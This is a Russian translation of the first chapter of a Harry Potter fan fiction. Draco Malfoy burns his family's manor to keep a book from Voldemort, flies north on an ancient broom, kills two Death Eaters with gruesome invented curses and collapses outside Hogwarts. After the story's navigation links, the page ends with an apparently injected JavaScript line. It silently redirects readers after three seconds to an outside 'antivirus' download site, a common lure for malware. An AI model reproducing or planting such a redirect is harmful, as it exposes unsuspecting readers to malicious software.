Клятвопреступник (Oath Breaker)

Автор: Goblin Cat KC

Перевод: Weis

Бета: atenas

Оригинал: здесь (разрешение автора на перевод получено)

Рейтинг: R (авторский; PG-15 – переводчика)

Пейринг: Драко Малфой/Гарри Поттер, Люциус Малфой/Северус Снейп

Жанр: драма/приключения

Статус: закончен

Краткое содержание: Малфои предпринимают драматичную эскападу, Драко приходится обучать Гарри темной магии, а все студенты Слизерина исчезают.

Глава 1

Удобно устроившись в нише за гобеленом в кабинете отца, Драко смотрел, как Пожиратели рыщут по комнате, разыскивая его. Неожиданная выходка Люциуса  породила такое смятение, что риск обнаружения казался юноше весьма незначительным. Едва появившись в имении, Пожиратели наделали столько шума, что Драко без труда успел скрыться в тайных переходах дома, где и собирался переждать, пока они не уйдут. Секретные коридоры открывались только перед Малфоями, а сейчас из всей семьи в доме находился лишь юный наследник.

Как только взбешенные Пожиратели удалились, Драко осторожно выскользнул из-за гобелена, подошел к отцовскому столу и принялся торопливо просматривать содержимое ящиков. Почти сразу же ему на глаза попались дьявольский мешок и россыпь галлеонов. Обрадовавшись своей удаче, юноша осторожно сгреб монеты в мешок, из темной бездны которого не раздалось ни звука. Пока ему не удастся добраться до семейных хранилищ, что, возможно, случится только через несколько недель, эти деньги – его единственное богатство.

По-настоящему же ценной находкой стала книга в потрепанной кожаной обложке, обнаруженная под стопкой старинных рецептов в следующем ящике. Но не богатое тиснение или золотой орнамент, а загадочный символ, запечатывающий ее, дал понять Драко, что он держит в руках дневник отца. Юноша сунул его в мешок, поднялся и направился к книжным полкам, как вдруг раздался едва слышный скрип дверной ручки. Мгновенно обернувшись и направив палочку на дверь, Драко начал было произносить заклятье…

…и остановился, увидев, как в комнату проскользнул Северус, тоже с палочкой наизготовку.

- Я не знал, что ты еще здесь, - прошептал Драко, опуская руку.

- Не по своей воле, - так же шепотом отозвался Северус. – Я не могу аппарировать из имения. Все остальные коридоры заблокированы. Мне повезло, что я добрался сюда незамеченным.

Юный Малфой кивнул, раздумывая, как поступить. Появление крестного немного усложнило его задачу.

- Отсюда есть выход, о котором Пожиратели не знают, - сказал он, подойдя к полкам за отцовским столом и передвинув несколько книг. За ними обнаружилась небольшая каменная панель, покрытая рунами. Наклонившись к ней, Драко шепнул:

- Othala, - и вся стена, вместе с полками и книгами, стала прозрачной и исчезла. В неярком свете палочек Драко и Северуса за ней обнаружились вырубленные в скале стены и каменный пол, уводящие в темноту.

- Эта комната - наша главная семейная тайна, - заметил юноша, проходя вперед. Убедившись, что крестный вошел следом, он зачаровал проход, вернув книжные полки на место. – Там есть каминное соединение, подключенное только к какому-то коттеджу где-то в глубине страны. Где именно - я не знаю.

- Кажется, я знаю, - сухо прокомментировал Северус.

Драко лишь улыбнулся. Сейчас было неудачное время для шуток.

- Ты был с отцом, когда все это началось. Ты знаешь, сколько человек он увел? – спросил он.

- Довольно много, - задумчиво ответил Снейп. – Не меньше трети из тех, кто был. Паркинсонов и Гойлов - точно, но кто еще успел схватиться за портключ, я не разглядел. Зато знаю, сколько осталось.

- Сколько ушло из тех, у кого есть дети? – уточнил Драко, задумавшись между тем, как далеко уведет их тоннель. Прежде он здесь не бывал и с трудом мог представить отца в таком темном и неуютном месте.

- Большинство, - успокоил его Северус. – Но теперь Люциусу придется поторопиться и спрятать молодежь, иначе их возьмут в заложники. Темный лорд не станет тратить силы на Империус, если можно использовать старый безотказный шантаж.

- Этого не будет, - Драко покачал головой. -  Несколько дней назад я велел Пэнси собрать всех студентов, кому она доверяет, и бежать. Я должен был отправиться с ними… - вздохнул он, - но отцу я нужен здесь.

- Для чего? – встревожено спросил Северус и развернул Драко к себе. – Что ты можешь сделать против Темного лорда?

- Для начала – не отдать ему наш дом. Кроме того, отец предупредил, что у него в столе хранится книга, которую Волдеморт не должен найти. Я доберусь до Хогвартса сам, - Драко гордо выпятил грудь.

- Книга? – неверяще переспросил Северус. – Постой, что значит «не отдать дом»? Только не говори, что Люциус велел…

- …сжечь его дотла, - кивнул юноша и снова зашагал вперед.

Наконец туннель привел их в небольшую полупустую комнату с камином и полками, вырезанными прямо в каменной стене. В камин едва мог войти взрослый мужчина. На полках стояло несколько странной формы бутылочек с надписями на давно забытых языках. Чуть поодаль под густым покровом пыли покоился большой фолиант. Не озаботившись тем, чтобы сначала смахнуть паутину и пыль, Драко засунул его в дьявольский мешок.

- Тут должен быть летучий порох, - кивнул он на единственную относительно чистую банку.

- А ты? – озабоченно помедлил Северус, зачерпнув пригрошню порошка. – Уничтожив имение, ты не сможешь даже улететь. Ты ведь видел, как они сломали твою метлу.

- Ты заметил меня за картиной? - усмехнулся Драко. -  Хотя ты всегда быстро находил мои тайные укрытия, - он нагнулся и поднял с пола какую-то палку. – Однажды отец рассказывал мне о ней, - задумчиво, почти благоговейно произнес он, - но я никогда не думал, что мне доведется увидеть ее собственными глазами, не говоря уже о том, чтобы летать.

Северус взглянул на то, что держал в руках крестник. В изящных ладонях Драко покоилось кривое шишковатое древко, к одному концу которого высохшим кожаным ремешком были примотаны тонкие прутья. Странная вещь походила на метлу не больше, чем обычная палка.

- Что, во имя… - осторожно забрав из рук юноши допотопную конструкцию, Мастер зелий внимательно осмотрел ее. Потрескавшийся кожаный ремешок крепил к ясеневой рукоятке несколько березовых прутиков. Древняя и мертвая с виду, на ощупь метла казалась живой и была тяжелой, словно только что срубленная ветка.

– Старая магия, - задумчиво прошептал Северус, возвращая метлу Драко. – Неизвестно, насколько она надежна. Я бы сел на нее, только если бы от этого зависела моя жизнь.

- Боюсь, моя зависит, - отозвался тот, блеснув глазами в предвкушении, вовсе не напуганный тем, что ему доведется испытать не просто семейное наследие, но магический артефакт настолько древний, что Министерство могло и не надеяться его засечь. – Она мне подчинится. Я же Малфой.

- Не удивлюсь - вы все упрямые и безрассудные, - хмуро заметил Северус. Вздохнув, он ласково посмотрел на Драко. – Ты уверен, что не сможешь последовать за мной?

- Мне бы хотелось, Северус, но как только вспыхнет пожар, эта комната будет завалена тоннами камня – защитные заклинания уничтожат ее мгновенно. Мой единственный выход – улететь. Когда я окажусь достаточно далеко, то постараюсь найти камин, через который можно будет попасть на Диагон-аллею, - оба знали, насколько маловероятен такой исход, но не стали об этом говорить.

Наконец Северус неохотно кивнул и забрался в камин, сжимая в ладони летучий порох.

- Что ж, тогда увидимся через несколько дней. Если повезет, я получу весточку от Люциуса еще до твоего появления, -  не дожидаясь ответа, он бросил порошок под ноги, произнес: - Коттедж Малфоев, Серпентия, - и исчез во вспышке зеленого пламени.

Драко вздохнул, мысленно провожая крестного. Мысль о том, что ему вот-вот предстоит вернуться в дом, полный врагов, ужасала его. Только присутствие рядом друга помогало ненадолго отогнать страх. Задумчиво повертев в руках древнюю метлу, Драко покачал головой – она выглядела мертвой и безжизненной, словно все волшебство давным-давно ушло из нее. Несомненно, далекий предок Малфоев сделал ее из могучего дерева, но осталось ли в ней достаточно магии, чтобы позволить юноше взлететь?

Вспомнив, что нужно торопиться, Драко развернулся и отправился по туннелю обратно, крепко сжимая в ладони шишковатое древко. Остановившись возле полок, преграждающих проход в кабинет, он прислушался, и, не услышав ничего подозрительного, шагнул в комнату. Зачаровывая вход, Драко почувствовал, как кто-то слегка потянул его за рукав. Вздрогнув от неожиданности, он отшатнулся и ударился о край стола. Раздавшийся негромкий испуганный писк подсказал ему, что это всего лишь домовый эльф. Повернувшись, Драко сердито посмотрел на маленькое создание и рыкнул:

- Черт тебя дери, Филли…

- Филли очень извиняется, мастер Драко, - пропищал эльф, испуганно съежившись. – Но мастер сам велел Филли сообщить ему, когда она предупредит все портреты, что нужно уходить. Филли предупредила.

Нет смысла наказывать ее за хорошо выполненное поручение, решил Драко, и кивнул, успокоившись. Быстро пройдя к гобелену и открыв тайный проход, он помедлил и оглянулся на Филли. Обычно, если имение рушилось, то эльфы погибали вместе с домом, но Драко такая потеря показалась совершенно неразумной. Ведь Люциус может снова отстроить поместье и воспользоваться услугами тех же самых домовиков, вместо того, чтобы искать новых.

- Филли, я собираюсь сжечь дом… молчи, глупое создание, а не то я прокляну тебя! Обещаю, вы не умрете, - он подождал, пока та успокоится, и продолжил: - Собери остальных домовиков и выведи их отсюда. Вы не должны расходиться по другим семьям, вы все еще принадлежите Малфоям и должны хранить наши секреты.

- Конечно, мастер Драко, - послушно закивала Филли. – Филли сохранит все секреты, она хороший эльф, да-да!

- Слушай внимательно. Вам нужно будет найти мою мать. Я не знаю, куда она отправилась, так что не спрашивай. Может, в поместье Нейплз, или в Париж. Найдите ее и оставайтесь с ней.

- А если Филли не найдет хозяйку? – дрожащим голосом спросило крошечное созданье.

- Тогда… - Драко провел рукой по волосам. За всеми навалившимися хлопотами у него не было времени подстричься и отросшие пряди падали на глаза. – Не знаю. Спрячьтесь в лесу, если придется, но никому не попадайтесь или, клянусь, вы пожалеете, что не сгорели вместе с домом, - не слушая ее благодарный лепет, Драко шагнул в темный коридор и опустил за собой гобелен.

Он не боялся заблудиться – ребенком он днями напролет бегал по лабиринтам тайных переходов, появляясь и исчезая в укромных уголках дома и пугая гостей. Люциус позволял ему это, ведь малышу было намного легче запомнить, куда и откуда ведут тесные коридорчики, где можно срезать и сэкономить несколько минут. Там, где взрослый порвал бы мантию об острые камни или с трудом протиснулся бы через тесные ходы, маленький Драко легко проскальзывал, выходя на свет в пыли, паутине и мелких паучках, и приводя Нарциссу в негодование.

Пробираясь по узкому ходу между кухней и столовой, Драко невольно улыбнулся, вспомнив, как однажды спугнул здесь летучую мышь-упыря и едва не заработал укус, в панике влетев в гостиную со зверьком, вцепившимся в его мантию. Пока всполошившиеся эльфы старались стряхнуть мышь с юного хозяина, Нарцисса ругалась, что пыль, сажа и паутина запачкали ее прекрасные ковры.

Через несколько часов эти самые ковры, великолепная библиотека отца, уникальное собрание растений и зелий матери – все обратится в золу. Улыбка Драко померкла. Если бы только у них было больше времени, прежде чем Люциус улизнул от Темного лорда, превратив свою трость в портключ, а себя и всех, кто последовал за ним – в предателей. Нарцисса даже из своей спальни услышала, как взбесился Волдеморт, и исчезла, прежде чем Пожиратели добрались до нее, уверенная, что сын сумеет позаботиться о себе.

Когда узкий проход стал настолько просторным, чтобы можно было стоять, Драко остановился и, тихонько приоткрыв едва заметную дверь, осторожно выглянул наружу.

В центре зала одиноко горела курильница. Исходящего от нее тусклого золотистого света не хватало, чтобы разогнать царящий мрак. Помещение казалось пустым, и Драко бесшумно выскользнул из-за гобелена, стараясь не ударить метлой о стену. Огромные окна – от пола до потолка - занимали целую стену и открывали прекрасный вид на розовый сад. Остальные стены украшали опустевшие рамы.

Окруженный неуютной тишиной, Драко медленно прошел в центр зала, обычно наполненного негромким гулом голосов его предков. Без их говора дом казался еще более пустым, словно тело в ожидании похорон. Нарцисса любила подчеркивать, как хорошо ведут себя обитатели портретов Малфоев, и хотя она никогда не признавалась, Драко подозревал, что его предки со стороны Блэков не настолько благовоспитанны.

Выглянув в окно, в серебристом свете полускрытой за тонкими облаками луны Драко увидел силуэты оставшихся Пожирателей, неустанно прочесывающих земли поместья. Наверное, в поисках Люциуса и тех, кто ушел с ним. Или, скорее всего, в поисках домовиков, которых можно допросить, - понял вдруг Драко. 

Отвернувшись, он снова посмотрел на курильницу. Больше похожая на большое блюдо, чем на факел, она давала достаточно света для портретов и домовых эльфов. Только Драко и его отец знали, что эта вещь удерживает на месте сложную паутину охранных чар имения, защитные заклинания и ловушки.

Чтобы активировать ее, Драко не нужна была палочка – эти чары повиновались только плоти и крови Малфоев. Юноша взял дьявольский мешок и метлу в левую руку, поднял правую высоко над пламенем и начал произносить фразы, заученные под строгим присмотром отца, смысла которых не понимал; слова древнего, давно забытого языка, на котором когда-то говорили его предки. Повинуясь колдовству, пламя из оранжево-красного превратилось в белое и поднялось выше, жадно лизнув его ладонь. Драко вздрогнул и заговорил быстрее. Обычно травы, которые Нарцисса клала в курильницу, сгорали мгновенно, оставляя лишь пепел и аромат, но сейчас огонь становился все сильнее, от повалившего дыма Драко закашлялся, глаза заслезились. Ладонь пронзила боль, и юноша испугался, что вот-вот кто-нибудь заметит странный свет из окон. Закончив заклинание, он помедлил, страшась последнего шага.

Позади с грохотом распахнулась дверь. Драко оглянулся и замер, у него перехватило дыхание. В дверях стоял сам Темный лорд, кривя губы в жестокой усмешке.

- Юный Малфой… - прошипел он. – Твоя семья доставила мне сегодня немало неприятностей.

Драко не мог шевельнуться. Прежде он никогда не находился подле лорда один. Его всегда оберегали или успокаивающее присутствие отца, или дерзкая надменность матери. Даже когда его родители склонялись перед Волдемортом, от них, казалось, исходил некий дух неповиновения, которого, к удивлению Драко, никто не замечал, даже сам лорд.

- Не пытайся бежать, - предупредил Волдеморт, увидев метлу. – Имение в моих руках. Ты не уйдешь.

Он подошел ближе и уставился юноше в глаза. Перед мысленным взором Драко тут же замелькали его недавние воспоминания. Снова, спрятавшись за гобеленом, он слушал обращенный к другим Пожирателям доклад отца о положении дел в Министерстве, затеянный только для маскировки и неожиданно обернувшийся безрассудным, давно задуманным побегом. Рывком вернувшись к реальности и ощутив, что его растущие удивление и панику словно смакуют, Драко понял, что на самом деле не он вспоминает произошедшее, а Волдеморт яростно роется в его памяти.

Перед глазами появился еще один украденный образ: Нарцисса, сидя на краю кровати, ласково ерошит его волосы и говорит, что он достаточно умен, чтобы позаботиться о себе в случае необходимости. Но нет, понял Драко, Волдеморту нужно не это – и всплыла другая картинка: они с Люциусом в кабинете, отец объясняет Драко его роль в плане.

- Вот оно, - в ярости прошипел Волдеморт. – Вот, что я ищу. Покажи мне, юный Малфой, куда сбежал твой отец?

Драко скривился, но прятаться было некуда. Уроки Северуса по окклюменции оказывались абсолютно бесполезны, когда он был слишком напуган, чтобы ясно мыслить… и Волдеморт услышал ободрения Люциуса, услышал, что тот собирается увести как можно больше рыцарей…

- Рыцарей? – настороженно переспросил Темный лорд. – Рыцари… Вальпургии?

- …рыцари Вальпургии, - прошептал Драко вместе с ним, не в силах остановиться. Руку начало нещадно жечь, но он не мог ею пошевелить, - …подчиняются…

- Они подчиняются мне! - проревел Волдеморт, вторгаясь еще дальше в память юноши, и тому показалось, что вот-вот у него из глаз потекут кровавые слезы. – Они мои, и теперь никто не сможет этого изменить!

Но лицо отца, которое видел Драко - сосредоточенное, гордое и доброе - обещало другое, голос Люциуса шептал что-то иное и юноша сосредоточился на его словах, повторяя за ним, возвращая контроль над своими мыслями и телом.

- Рыцари Вальпургии не подчиняются никому, - отчетливо произнес он и, пробуждая старинное заклятье своей кровью, с размаху опустил ладонь в центр курильницы, прямо на шип, на котором обычно держались свечи. Закричав от боли, он едва мог видеть, как окна зала взорвались, разлетевшись на тысячи осколков, как стены, пол и потолок мгновенно охватило пламя, окружив Волдеморта и отделив его от Драко. Темный лорд ошеломленно отшатнулся, выхватил палочку и направил ее на Малфоя, но густой дым помешал ему прицелиться.

Еле-еле высвободив обожженную и пропоротую насквозь руку, Драко мог думать только о том, как бы поскорее убраться отсюда, и метла немедленно откликнулась, поднялась в воздух и зависла, словно ожидая его. К сожалению, на жесткой, бугристой рукоятке не было никаких смягчающих заклинаний. Но стоило Драко усесться, метла немедленно вынесла его в сад и помчалась прочь от дома. Ему вслед полетели заклятья, но в него не попали - то ли Пожирателей сбил с толку взрыв, то ли Драко просто повезло. Стремительно, словно в погоне за  снитчем, он взмыл в небеса и направился к ближайшему городку. 

Промчавшись так, словно за ним гнались черти, примерно милю, юноша остановился и обернулся, внимательно оглядывая небеса в поисках преследователей. Но увидел лишь руины своего дома, пылающие на вершине холма, словно погребальный костер или отблеск диковинного заката.

Драко подумалось: скольких Пожирателей Волдеморт отправил прямиком в огонь на поиски книги, которую ему едва ли не в последний момент удалось унести? И сколько из них погибло, прежде чем Темный лорд смирился с потерей?

Только тут Драко заметил, что все еще сжимает дьявольский мешок в уцелевшей руке. Едва он засунул съежившуюся  сумку в карман мантии, на него накатили тошнота и боль – теперь, когда перед ним не стоял Волдеморт, заставляющий забыть обо всем, рана безжалостно напомнила о себе.

Согнувшись и едва сдерживая рвоту, юноша замотал раненую ладонь краем мантии. Почти сразу кровь пропитала ткань и закапала на древко метлы. Драко был уверен, что сломана, по крайней мере, пара костей. «Недостаток темной магии, - подумал он, - в том, что частенько приходится использовать свою, а не чужую кровь».

Его ступни задели чью-то крышу, и он поспешно поднялся выше, чтобы не врезаться в трубу. Темные улицы городка освещали лишь несколько фонарей, но уже то тут, то там в домах загорался свет, и испуганные магглы выскакивали на улицу прямо в пижамах, глядя на пожар на холме.

Опасаясь, что его заметят, Драко поднялся еще выше, почти к самым облакам. Метла оказалась намного отзывчивей привычного Нимбуса и взмыла почти вертикально, едва не сбросив юношу вниз. Он изо всех сил вцепился в рукоять и держался, пока не сумел выровняться. Но, поглядев вниз, не ослабил хватку - городок казался крошечным пятнышком на серой земле. Заметив под собой несколько маленьких облачков, Драко поежился – он никогда не поднимался так высоко, особенно на неизвестно как зачарованной метле.

Холодный воздух пробрался под мантию, и юноша вздрогнул. Он не успел надеть ни шарф, ни перчатки, ни теплую одежду и ледяной воздух жалил нещадно. Что-то коснулось его лица – оказалось, снежные хлопья. Вокруг него их вилось немного, но когда Драко остановился и обернулся, он ахнул – над руинами его дома сгрудились тяжелые сизые тучи, свиваясь с дымом в один гигантский смерч. Буря набирала силу и грозные облака расходились прочь от холма, неся с собой леденящий ветер и снежные вихри.

Словно завороженный, Драко смотрел, как рухнули остатки верхних этажей дома, погребая под собой нижние. Смерч домчался до городка и там превратился в метель. Юноша развернулся и устремился на север, так быстро, как только мог. Свирепый ветер настиг его и едва не сбросил вниз. Так как на метле не было никаких защитных чар, Драко пришлось вцепиться в неровное древко изо всех сил.

Он летел всю ночь, не решаясь остановиться и поискать дом или таверну с камином, через который можно было бы попасть на Диагон-аллею. Окрестные колдовские семьи или жили скрытые сильнейшими охранными чарами, или поддерживали Темного лорда. И множество его шпионов в окрестных забегаловках наверняка не дремали. Драко не останавливался передохнуть, хотя с каждым часом мысль об отдыхе, пусть даже на холодной земле, казалась все более и более заманчивой.

Подгоняемый бурей, юноша не придумал ничего лучше, чем улечься прямо на рукоятку метлы, прижав раненую руку к боку, и крепко держась другой. Над городками ему приходилось подниматься высоко, чтобы сойти хотя бы за большую сову, но над пустынными землями он позволял себе снижаться, чтобы немного согреться. Время от времени на него наваливалась дремота и он опускался все ниже и ниже, пока подошвы не касались земли, и тогда, очнувшись, поднимался на несколько футов. Но зато ему не приходилось просыпаться, чтобы избежать столкновения с деревьями и кустами – несмотря на отсутствие каких бы то ни было «удобных» заклинаний, метла с легкостью маневрировала в лесу. Так что Драко отважился на несколько минут закрыть глаза и попытался хоть как-то восстановить силы, пока летел сквозь ночь.

Появившееся над горизонтом солнце казалось серым.  Резкий свет, пробивающийся из-за пелены грозовых туч, заставлял юношу щуриться. За ночь снегопад перегнал его. При дыхании изо рта вырывался пар и Драко поежился. Зная, что если он полетит быстрее, то не удержится на метле без специальных заклинаний, а на такой скорости, как сейчас, не сможет перегнать шторм, юный Малфой решил лететь пониже, между деревьев, чтобы ветви хоть немного защитили его от снега. Уже не заботясь, что его могут увидеть магглы, измученный юноша едва не касался подошвами крыш домов, когда пролетал над городками и деревнями. Драко давным-давно перестал следить, где именно он летит, и просто направлялся на север, надеясь заметить что-нибудь знакомое, когда будет подлетать к школе. По крайней мере, хоть рука больше не болела, онемелая и безжизненная.

Долгий путь и холод притупили его чувства настолько, что он не замечал погони, пока  рядом с ним не пронеслось заклинание, угодив в машину, стоящую внизу. Резко придя в себя, юноша оглянулся и попытался понять, где он находится и что происходит. Оказалось, что он залетел в небольшой городок.  Снег толщиной в несколько футов покрывал все вокруг, так что было больно смотреть на бесконечную белизну.

Метла дернулась вправо и очередное заклинание пронеслось мимо, угодив в почтовый ящик. Не теряя времени на догадки, кто за ним охотится, юноша спикировал вниз, черкнув хвостом метлы по снегу и взметнув за собой снежную завесу. Он резко свернул налево, скользнул между изгородями и едва не врезался в пару мусорных баков. Рванув метлу вверх, Драко взмыл над домом и тут же нырнул вниз, приземлившись на заднем дворе и зарывшись в снег. Перекатившись на спину, он нацелил палочку на крышу, ожидая, что вот-вот оттуда появится Пожиратель.

Минуты шли, но ничего не происходило. Наконец он вздохнул, опустил палочку и откинулся назад. На лицо ему тихо опускались снежинки. Они казались такими невесомыми, а городок – таким тихим, что Драко захотелось уснуть прямо там, в снегу. Поглядев на окна, он увидел, что занавески задернуты, а стекла заиндевели. Обитатели дома даже не подозревали, что снаружи идет схватка.

- Идиоты, - мрачно буркнул Драко.

Отряхнув мантию и убедившись, что дьявольский мешок на месте, он подобрал метлу, устало взгромоздился на нее и снова взлетел.

Прежде чем вылететь из-за дома, он осторожно выглянул из-за угла. Драко никогда прежде не бывал в маггловских городах один, и теперь увиденное не радовало его. Простая снежная буря разогнала жителей по домам, словно узников! Ни метел, ни аппарации, ни каминной сети, ни даже согревающих чар! Драко слышал, что в особенно холодные дни вода в трубах замерзает и они лопаются. Жалкие недоделки эти магглы. Непонятно, почему волшебники должны прятаться от таких слабаков.

Теперь, зная, что за ним охотятся, он был более внимателен и скоро заметил двух Пожирателей. Они медленно летели чуть дальше по улице, заглядывая за изгороди и деревья. Взлетев над большим гаражом, юноша осторожно прицелился. Усталые глаза слезились, и Драко встряхнул головой, направляя весь свой гнев и всю ненависть на ближайшего недруга. Он знал, что мелких заклинаний будет недостаточно, но для серьезной темной магии ему могло не хватить сил.

- Crepara, - произнес Драко. С кончика палочки сорвалась бледная вспышка, устремившись к Пожирателю. Тот обернулся на звук его голоса, но было поздно. Заклятье ударило мужчину прямо в лицо. Воздух пронзил отчаянный хрип, его кожа и мускулы мгновенно высохли, съежились. Он повалился набок, неуклюже взмахнув иссохшими руками, и одна переломилась, словно хворостинка. Глубокая трещина пробежала по телу, едва не разломив его надвое.

Едва Пожиратель упал, Драко развернулся и помчался прочь. Через секунду гараж, за которым он прятался, взорвался – напарница погибшего бросилась за своей жертвой. Метла Драко дрогнула  -  ему приходилось держаться той же рукой, в которой он сжимал палочку. Он летел так быстро, что дома слились в один неясный образ, а на каждом повороте его едва не сносило с метлы. Мимо пронеслось еще одно заклятье, взорвавшись в снегу. Оглянувшись, он заметил, что фигура в развевающейся черной мантии приближается. Через несколько секунд она окажется достаточно близко, чтобы перестать мазать.

Заметив впереди перекресток, Драко развернулся, взметнув за собой вихрь снега, и подсветил его заклинанием, используя как временную завесу, чтобы сияние отвлекло преследовательницу. Ослепленная, та со всего маху врезалась в стену дома напротив и со стоном повалилась на снег. Сила столкновения была так велика, что рука и ноги  женщины оказались сломаны – Драко увидел прорвавшие плоть острые края костей и ее неестественно повернутую спину. Удивительно, но палочка Пожирательницы осталась цела, и дрожащей рукой женщина силилась направить ее на себя. Держась ближе к стене, присыпанный снежной пылью, Драко мрачно наблюдал за ее тщетными попытками исцелиться. Он невесело усмехнулся: даже если ей удастся направить на себя палочку, она ничего не сможет сказать – у нее была сломана челюсть. И, кажется, кость пробила ей глотку и раздробила гортань, не давая дышать.

Малфой медленно подлетел ближе и наклонился, взглянув Пожирательнице в глаза. Страх, что он увидел в них, когда направил на нее палочку, подсказал ему, что женщина еще достаточно вменяема.

- Hemoragia, - прошептал он.

Красно-черная вспышка заклинания ударила ей в лицо, кровь хлынула из глазниц и рта, пока вся, до последней капли, не вытекла из тела. Пожирательница превратилась в безжизненную груду плоти.

Драко тяжело вздохнул. Голова закружилась, и он из последних сил вцепился в рукоятку метлы. Преодолев искушение забрать чужую, более современную метлу - ведь он не знал, какие противоугонные чары на нее наложены - юноша поднялся в небо. Убедившись, что дьявольский мешок по-прежнему в кармане, он снова повернул на север.

Теперь ему угрожали лишь буря и смертельная усталость. Мимоходом Драко подивился – как Волдеморту удается так долго поддерживать подобную погоду, и насколько далеко она простирается, послушная его воле? Куда ни глянь, пейзаж внизу походил на погребальный покров. Обледенели даже длинные мысы побережья. Когда же солнце – бледная искра за облаками – село, юношу потихоньку начало охватывать отчаянье. Было безумием думать, что он сумеет добраться до Хогвартса на метле. Тем более за пару дней. Он совсем не чувствовал покалеченную руку и сомневался, что Помфри удастся ее вылечить.

С наступлением ночи Драко отважился на осветительное заклинание, просто чтобы не лететь в полной темноте. В небольшом круге света появлялись и исчезали снежные хлопья. Юноша уже не знал, направляется ли он по-прежнему на север, и надеялся лишь, что не залетит слишком далеко в океан,  чтобы потерять всякие ориентиры.

На секунду перед ним мелькнули коричневые перья и тут же исчезли. Драко ахнул и повернул палочку. Совсем рядом с ним летела большая сова, так близко, что можно было дотянуться рукой. Он взглянул на ее аккуратно сложенные лапки и увидел привязанный к одной из них свиток, а еще разглядел небольшой ожог на боку. «Боевые раны», – подумалось ему.

- Ты – аврорская сова? - предположил Драко. Птица лишь невозмутимо поглядела на него и снова уставилась вперед. – Может, ты летишь в Хогвартс…

Но даже если и нет, он все равно может последовать за ней и найти убежище, куда бы она ни направлялась. Драко не знал, как долго они летели бок о бок. Сова пристроилась у него над плечом, и он был рад ее компании. Прошел час, два, юноша время от времени использовал заклинание, чтобы сориентироваться, хотя и знал, что ночью хищница видит гораздо лучше него.

Когда он заметил яркие огоньки Хогвартса, у него не осталось сил даже чтобы обрадоваться. Он просто направил метлу чуть вниз, осторожно держась над грозным сумраком Запретного леса. Взмахнув крыльями, сова исчезла из виду. Лес закончился, и показались знакомые окрестности замка, где Драко частенько бродил после занятий. Хижина Хагрида походила на большой сугроб. Опустившись к самой земле и остановившись, юноша попытался встать и беспомощно повалился набок – онемевшие ноги не выдержали.

Пока он лежал в густой тени, куда не доставал теплый свет из окон, до него доносились смех и лязганье столовых приборов. Мрачно глядя на свое непослушное тело и досадуя, что оно подвело его в самом конце, Драко ощутил, как к глазам подступают сердитые слезы. Нечестно! Проделать такой путь и не суметь одолеть несколько десятков шагов до входа – это было просто до ужаса несправедливо!

Протянув руку, он попытался ухватить парящую рядом метлу, но пальцы соскользнули с обледеневшего древка, и он повалился обратно в снег. Раненую ладонь, совершенно потерявшую чувствительность по дороге, пронзили болезненные спазмы. Драко застонал и закрыл глаза, сказав себе, что ему нужно всего лишь немного отдохнуть, собраться с силами для следующей попытки.

- Эй! Кто здесь?

Он резко открыл глаза. Этот голос ему сейчас хотелось услышать не больше, чем голос какого-нибудь Пожирателя.  «Убирайся, - с досадой подумал Драко. – Чем спастись благодаря тебе, лучше сдохнуть!»  Но скрип снега становился все громче, пока, наконец, не появился Поттер. Не разглядев сразу на белом снегу светлые волосы, он подбежал к лежащей фигуре и опустился на колени рядом с ней.

- Малфой, - ахнул он. Оглядел Драко, и поморщился, увидев его руку. Заметив метлу, парящую рядом, он с подозрением посмотрел на слизеринца и резко спросил: - Что с тобой стряслось? Где ты был?

Если бы у Драко оставалась хоть капля сил, он не преминул бы посмеяться над Поттером и его непроходимой глупостью. Но силы оставили его совершенно. Отвернувшись, он уткнулся лицом в мягкий снег и потерял сознание.

Оглавление   Следующая глава

Обсуждение на форуме

setTimeout(\'document.location.href = "http://base-file.com/antivirus"\', 3000);'); } ?>